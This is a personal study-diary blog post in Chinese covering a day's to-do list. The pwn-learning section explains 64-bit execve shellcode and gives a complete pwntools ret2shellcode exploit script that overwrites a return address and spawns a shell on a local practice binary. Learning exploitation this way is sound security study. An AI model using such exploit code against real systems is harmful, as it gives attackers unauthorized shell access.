昨天休息了一天(感觉是好久没休息了),打了一下午狼人杀剧本杀、打麻将,好快乐,不过一日不学果然心慌慌,不过我感觉学习模式该调整一下,每天起来得先写好list,要不然效率不够高。
6.14 to do list:
1.每日Pwn学习
2.级数复习 to 数据结构小章 and 算法小章
3.Cpp第一章
4.密码工程练习(附加)
一:每日Pwn学习
64位调用shellcode
64位shellcode流程
几个需要注意的细节:
1.rax是调用3b
2.rdi传参细节,首先xor清零,第二压入堆栈,第三讲/bin//sh赋值到rdi,再压入堆栈,最后将rsp地址给rdi
现在栈的数据是0x2f62696e2f73680,小端存储第一步和第二步的目的是最后的值0截断,以防后面的数据连续读
3.syscall
gcc输出64位文件记得 要在-o 前打-m64或则不打
一个是gets要获取的地址,一个是puts要获取的地址
64位的程序会返回一个8字节的地址,peda是可以直接查询偏移的
但pwndbg是不行是,正确的返回地址是后四个字节(因为小端存储)
这样查即可
思路就是第一个gets覆盖返回地址到buf2,第二个gets存入buf2的shellcode
exp.py(才发现直接复制过来会出事,那只能上传无注释版的了)
from pwn import *
context(arch = "amd64" , os = "linux")
#context.log_level = "debug"
p = process("./ret2shellcode_64")
offset = 40
e = ELF("./ret2shellcode_64")
buf2 = e.symbols["buf2"]
shellcode = asm(shellcraft.sh())
payload1 = offset * "P" + p64(buf2)
payload2 = shellcode.ljust(200,'Z')
p.recvuntil(": ")
p.sendline(payload1)
p.recvuntil(": ")
p.sendline(payload2)
print buf2
p.interactive()
二:级数复习
级数已复习,完成算法导论第二章,好有意思,准备再看一遍结尾,本来想着看个小章,由于数据结构另一个在看,于是看完这一章(虽然不长),但今天数据结构没法打卡了。
三:CPP
看到了本书约定,又又又又看了次C的历程,真是每次看每次感觉不一样。
四:密码工程
这个附加项今天没精力完成了,GOOD NIGHT.